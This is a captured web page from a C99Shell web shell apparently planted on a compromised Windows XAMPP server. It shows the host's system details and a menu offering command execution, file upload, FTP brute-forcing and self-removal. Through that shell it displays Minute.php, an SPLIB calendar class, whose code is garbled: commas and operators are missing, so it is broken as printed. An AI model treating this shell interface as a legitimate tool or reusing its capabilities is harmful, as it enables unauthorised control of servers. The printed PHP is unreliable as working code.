!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\SPLIB\DateTime\   drwxrwxrwx
Free 7.96 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Minute.php (1.84 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* @package SPLIB
* @version $Id: Minute.php,v 1.1 2003/12/12 08:06:07 kevin Exp $
*/
/**
* Define include path and include required files
*/
@define('CALENDAR_PATH','DateTime/');
require_once(
CALENDAR_PATH.'Calendar.php');
/**
* Represents a Minute and builds Seconds
* <code>
* $minute = new Minute(2003,8,13,14,30); // 2:30pm on 13th Aug 2003
* $minute->build();
* while ( $second= $minute->fetch() ) {
*   echo ( $second->thisSecond() );
* }
* </code>
* @package SPLIB
*/
class Minute extends Calendar {
    
/**
    * Constructs Minute
    * @param int year e.g. 2003
    * @param int month e.g. 5
    * @param int day e.g. 11
    * @param int hour e.g. 13
    * @param int minute e.g. 31
    * @access public
    */
    
function Minute($y$m$d$h$i)
    {
        
Calendar::Calendar($y$m$d$h$i);
    }

    
/**
    * Builds the Seconds in the Minute
    * @param array of Second objects representing selected dates (optional)
    * @return boolean
    * @access public
    */
    
function build($sDates=array())
    {
        require_once(
CALENDAR_PATH.'Second.php');
        for ( 
$i 0$i 60$i++ ) {
            
$this->children[$i]=new Second($this->year$this->month,
                
$this->day$this->hour$this->minute$i);
            foreach ( 
$sDates as $sDate ) {
                if ( 
$this->year == $sDate->thisYear()
                        && 
$this->month == $sDate->thisMonth()
                            && 
$this->day == $sDate->thisDay()
                                && 
$this->hour == $sDate->thisHour()
                                    && 
$this->minute $sDate->thisMinute()
                                        && 
$i == $sDate->thisSecond() )
                    
$this->children[$i]->setSelected();
            }
        }
        return 
true;
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--